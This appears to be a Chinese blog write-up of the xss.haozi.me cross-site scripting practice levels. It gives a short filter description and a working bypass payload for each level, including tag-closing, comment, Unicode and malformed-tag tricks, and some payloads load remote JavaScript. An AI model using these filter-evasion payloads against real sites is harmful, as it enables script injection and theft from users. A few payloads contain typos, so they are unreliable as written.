0x00
<script>alert(1)</script>0x01
html中闭合</textarea>即可执行
<script>alert(1)</script>0x02
html中闭合input标签
"><script>alert(1)</script>0x03
服务器过滤括号(),不使用括号即可
<script>alert`1`</script>0x04
服务器过滤括号和反引号(), \`
<svg>可以执行unicode
<svg><script>alert(1)</script></svg>0x05
服务器将-->转义
--!><script>alert(1)</script>0x06
服务器正则匹配on开头=结尾的全部转义
="alert(1)"
2. ```
type=image src onerror
=alert(1)类似即可
0x07
服务器正则匹配<>,以<开头,以>结尾的全部替换为空
所以只以<开头,不写 >,即可
<svg onmouseover="alert(1)" 0x08
将</style>转义为坏蛋两个字
</style ><script>alert(1)</script>0x09
必须包含提供的网址,输入网址后,对其中的</script>闭合构造新的语句
http://www.sementfault.com"></script><script>alert(1)</script>0x0A
将&"'<>/进行了转义,并且必须包含网址,输入网址后,添加@及js地址,实现绕过
http://www.segmentfault.com@xss.haozi.me/j.js0x0B
将输入的内容转义成大写,html、标签、域名不区分大小写,js区分大小写,让服务器返回J.JS即可
<script src="http://127.0.0.1/xss_1/j.js"></script>0x0C
过滤script,进行畸形构造scrscriptipt
<scrscriptipt scr="http://127.0.0.1/j.js"></scrscriptipt>0x0D
过滤了</'"并对alert()进行了注释,通过回车破坏注释结构,结束时使用-->注释掉')
alert(1)
-->0x0E
对<后面加一个字符进行过滤,即<s转义欸<_s
使用ſ字符来替代s
<ſcript scr="http://127.0.0.1/xss_1/j.js"0x0F
对&'"<>\进行过滤,但是浏览器会先解析html,再解析js
');alert('10x10
无过滤,直接在<script>中执行即可
alert(1)0x11
"转义为\",虽然转义,但是不影响闭合
");alert(1)//0x12
对"过滤为\",不影响注入,重新构造script
</script><script>alert(1)</script>文章链接:https://xdym11235.com/archives/58.html
本站所有文章除特殊说明外全部采用CC BY-NC-ND 3.0 CN协议
